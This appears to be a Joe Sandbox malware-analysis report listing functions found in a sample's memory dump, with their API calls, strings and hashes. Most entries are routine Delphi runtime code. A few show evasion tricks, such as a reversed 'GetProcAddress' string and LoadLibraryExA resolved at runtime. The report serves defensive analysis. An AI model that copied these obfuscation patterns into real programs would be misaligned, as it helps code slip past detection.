Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: cdd262826216f77dac0f49a339e63bbca6bffc414c857b027eaf60bf97deabf0
Instruction ID: d32df48ba484ddfdfc116ad99115424d1e5f5d7dbceae4ce2dbbfc69f19e0994
Opcode Fuzzy Hash: cdd262826216f77dac0f49a339e63bbca6bffc414c857b027eaf60bf97deabf0
Instruction Fuzzy Hash: 5BF09274944302DFCB60DF28D542A1577E9FB4D724F54892DE8999A380E7349414CB62

Function 027CA798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027CBDFA,00000000,027CC013,?,?,00000000,00000000), ref: 027CA7AB

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
Instruction ID: 7ca50a57e00320ac92d788659509005764e3f4987ececac923baf37ddcd3626d
Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
Instruction Fuzzy Hash: CFD05EA630E2642AA320656A2D94DBB5AECDAC97A2F20803EF948C6200D2008C0696F1

Function 027C9194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 027C9198

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
Instruction ID: c6f26b392baaec754d7c43ef94b3a9b7af7a6a2d1b49cf444c7f5532f8c3099d
Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
Instruction Fuzzy Hash: 79A0124040482001854037280C0213530445840720FD40F4868F8502D0ED1D012050D3

Function 027C20C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 027CD21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027CD225

Part of subcall function 027CD1F0: GetProcAddress.KERNEL32(00000000), ref: 027CD209

Strings

VarBstrFromDate, xrefs: 027CD3EB
VarIdiv, xrefs: 027CD2CD
VarCmp, xrefs: 027CD33B
VarNot, xrefs: 027CD25F
VarXor, xrefs: 027CD325
VarBstrFromCy, xrefs: 027CD3D5
VarR8FromStr, xrefs: 027CD37D
VarMul, xrefs: 027CD2A1
oleaut32.dll, xrefs: 027CD220
VarBoolFromStr, xrefs: 027CD3BF
VarR4FromStr, xrefs: 027CD367
VarSub, xrefs: 027CD28B
VarDateFromStr, xrefs: 027CD393
VarAnd, xrefs: 027CD2F9
VarDiv, xrefs: 027CD2B7
VarI4FromStr, xrefs: 027CD351
VarAdd, xrefs: 027CD275
VarOr, xrefs: 027CD30F
VarMod, xrefs: 027CD2E3
VarNeg, xrefs: 027CD249
VariantChangeTypeEx, xrefs: 027CD233
VarBstrFromBool, xrefs: 027CD401
VarCyFromStr, xrefs: 027CD3A9

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 8d4371c30ab25ae1002aad4bcc044d4b40412a0515c243ae156ffd8c0d9acaf2
Instruction ID: b450f104a97c9a9bd65b517401c30870a92795ea39b1ed74e6152620448a6d4d
Opcode Fuzzy Hash: 8d4371c30ab25ae1002aad4bcc044d4b40412a0515c243ae156ffd8c0d9acaf2
Instruction Fuzzy Hash: AD410975A842445F523AAB7E7408467BBDAD688710373843FBA0CCB786DE30BC558E2D

Function 027D6E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 027D6E66
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 027D6E77
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 027D6E87
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 027D6E97
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 027D6EA7
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 027D6EB7
GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 027D6EC7

Strings

CoInitializeEx, xrefs: 027D6E81
CoCreateInstanceEx, xrefs: 027D6E71
CoAddRefServerProcess, xrefs: 027D6E91
CoResumeClassObjects, xrefs: 027D6EB1
CoSuspendClassObjects, xrefs: 027D6EC1
CoReleaseServerProcess, xrefs: 027D6EA1
ole32.dll, xrefs: 027D6E61

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 1779b30352ad2f041c68cf4edc1eb7cc79432c11d8f6be2c2109029f3d7d3fb9
Instruction ID: 5005f1cfac2debe00085470573f3c9fac8a18cf3af4bcaceeeed33c909504c40
Opcode Fuzzy Hash: 1779b30352ad2f041c68cf4edc1eb7cc79432c11d8f6be2c2109029f3d7d3fb9
Instruction Fuzzy Hash: 7DF045F0A89711AEBB11BF70BCC583B2F6EA955708324592DA5427D902DBB58D104FA8

Function 027C2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027C28CE

Strings

An unexpected memory leak has occurred. , xrefs: 027C2690
Unknown, xrefs: 027C278C
bytes: , xrefs: 027C275D
Unexpected Memory Leak, xrefs: 027C28C0
String, xrefs: 027C27A1
7, xrefs: 027C26A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 027C2849
The unexpected small block leaks are:, xrefs: 027C2707
, xrefs: 027C2814

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: fa553f612f91cd5816354babaccdb7826dba9a1c572f78de1145e2d83841373a
Instruction ID: f9a1358d3ea19e4e82e0fcdc3b829f6c0fe041bb7a3e95097b7c5b8423252512
Opcode Fuzzy Hash: fa553f612f91cd5816354babaccdb7826dba9a1c572f78de1145e2d83841373a
Instruction Fuzzy Hash: 4FA19130A042648BDB22AA3CCC88B99B6E5EB09754F2441FDDD49AB387CF7589C5CF51

Function 027C252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

An unexpected memory leak has occurred. , xrefs: 027C2690
bytes: , xrefs: 027C275D
Unexpected Memory Leak, xrefs: 027C28C0
7, xrefs: 027C26A1
The sizes of unexpected leaked medium and large blocks are: , xrefs: 027C2849
The unexpected small block leaks are:, xrefs: 027C2707
, xrefs: 027C2814

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 7eb2bb2468dedad1a19334cc00c32470be6df886f32266ffe0db73d96c79f1e9
Instruction ID: 6d59e4d91374506a3c73fb787ca1be0f286f88d77ff4038c139a2db901fc31c5
Opcode Fuzzy Hash: 7eb2bb2468dedad1a19334cc00c32470be6df886f32266ffe0db73d96c79f1e9
Instruction Fuzzy Hash: BF719530A082588FDB22AA3CCC88BD9BAE5EB09714F2441EDD949E7283DF7549C5CF51

Function 027CBD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,027CC013,?,?,00000000,00000000), ref: 027CBD7E

Part of subcall function 027CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A

Strings

AMPM , xrefs: 027CBFA1
m/d/yy, xrefs: 027CBE4D
:mm:ss, xrefs: 027CBFCE
mmmm d, yyyy, xrefs: 027CBE7A
AMPM, xrefs: 027CBF92
:mm, xrefs: 027CBFB1

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 779c384bd01bfe35f4f28df326c7bb6ba47350c6e42c70d7e982f378e83d42ce
Instruction ID: c0f2b439c7ef951bb6342c72a327c9056d45435175581703846440e5834a34ca
Opcode Fuzzy Hash: 779c384bd01bfe35f4f28df326c7bb6ba47350c6e42c70d7e982f378e83d42ce
Instruction Fuzzy Hash: 29617139B001489BDB02EBB4EC64A9FB7BBAB48301F71943EA101AB745DA35D9498F54

Function 027DAE20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 027DAE40
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 027DAE57
IsBadReadPtr.KERNEL32(?,00000004), ref: 027DAEEB
IsBadReadPtr.KERNEL32(?,00000002), ref: 027DAEF7
IsBadReadPtr.KERNEL32(?,00000014), ref: 027DAF0B

Strings

KernelBase, xrefs: 027DAE52
LoadLibraryExA, xrefs: 027DAE4D

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 3fa1dde31095019c0cd2adce0c1a52c31426cee54ef3ae455332a6ae78cfda53
Instruction ID: 39677e77180feee70b502cfd2ebffa8f97a7b7739535e1effdb7423e654ae1d8
Opcode Fuzzy Hash: 3fa1dde31095019c0cd2adce0c1a52c31426cee54ef3ae455332a6ae78cfda53
Instruction Fuzzy Hash: F6314FB2A40305BBDB20DF68CC89F5A77B8BF06724F144564EA54EB280D374E950CBA5

Function 027C432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?,028207C8,?,?,027ED7A8,027C655D,027EC30D), ref: 027C4365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?,028207C8,?,?,027ED7A8,027C655D,027EC30D), ref: 027C436B
GetStdHandle.KERNEL32(000000F5,027C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?,028207C8), ref: 027C4380
WriteFile.KERNEL32(00000000,000000F5,027C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?), ref: 027C4386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027C43A4

Strings

Runtime error at 00000000, xrefs: 027C435E, 027C439D
Error, xrefs: 027C4398

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 5d146d3ae4a501139136964ae8c2ff191666e08badc72e6dfc7edb58065a8144
Instruction ID: 0290624546b6979eccb322be0623bceb79d136549c934cc1c365d295f79e3db1
Opcode Fuzzy Hash: 5d146d3ae4a501139136964ae8c2ff191666e08badc72e6dfc7edb58065a8144
Instruction Fuzzy Hash: 01F0F6B4AC030079FA25A3B06C2AF592B5D0788B20F740A1CB628A40C1C7E890C4CB32

Function 027CAE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 027CACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027CACE1
Part of subcall function 027CACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027CAD05
Part of subcall function 027CACC4: GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027CAD20
Part of subcall function 027CACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027CADB6

CharToOemA.USER32(?,?), ref: 027CAE83
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 027CAEA0
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027CAEA6
GetStdHandle.KERNEL32(000000F4,027CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027CAEBB
WriteFile.KERNEL32(00000000,000000F4,027CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027CAEC1
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 027CAEE3
MessageBoxA.USER32(00000000,?,?,00002010), ref: 027CAEF9

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 9344df3e81b009a1b4241cef9eaace335b3e70f1df130e61bf931306fff351a5
Instruction ID: eaadf68b123fae0cac5a5429ef1b8043a06e31bba5b8e6104b7d43f36a5bf978
Opcode Fuzzy Hash: 9344df3e81b009a1b4241cef9eaace335b3e70f1df130e61bf931306fff351a5
Instruction Fuzzy Hash: C01170B65842057ED302FBB4DC89F9B77EEAB85700F60092EB344E61D1DA71E9448F62

Function 027CE514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027CE5AD
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027CE5C9
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027CE602
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027CE67F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027CE698
VariantCopy.OLEAUT32(?,00000000), ref: 027CE6CD

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: 2cb618a4c31123327178c5a5472d9195296cafec5c291ae541f322ce06a5d305
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 0351C875A0062D9BCB22EB68CC94BD9B3BDBF4D300F5041EDE949A7241D634AF858F61

Function 027C3568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027C358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027C35BD
RegCloseKey.ADVAPI32(?,027C35E0,00000000,?,00000004,00000000,027C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027C35D3

Strings

FPUMaskValue, xrefs: 027C35B4
SOFTWARE\Borland\Delphi\RTL, xrefs: 027C3580

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 518ef2149cdf098a57ca6132d51b37dcac49ac0875600e25cd9704e67b854861
Instruction ID: 3ac56f315323c17da2f222ecace8a2432bcc3ce3af9995a1d116bf77d6116b0f
Opcode Fuzzy Hash: 518ef2149cdf098a57ca6132d51b37dcac49ac0875600e25cd9704e67b854861
Instruction Fuzzy Hash: 4901B5B9A40218FAEB11DBB09D02BBE77ECD708710F6045ADBA04E6580F6749610CA68

Function 027D80C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
GetProcAddress.KERNEL32(?,?), ref: 027D812D

Strings

Kernel32, xrefs: 027D8110
sserddAcorPteG, xrefs: 027D80E3

Memory Dump Source

Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true

Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_27c0000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: a4cee9a99b680e8d4f250e5d71799df4d6cd8bf277f583447b91731106d5c786
Instruction ID: 1d850b71241cb59b4e5f07587b83a4ab6f6522820cf02439ecf0082154bb7753
Opcode Fuzzy Hash: a4cee9a99b680e8d4f250e5d71799df4d6cd8bf277f583447b91731106d5c786
Instruction Fuzzy Hash: EC01A778640304AFEB01EFB4DC59E5E77BEEB48710F62886CF404D7640D634A9048A25

Function 027CA9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,027CAA6F,?,?,00000000), ref: 027CA9F0

Part of subcall function 027CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A

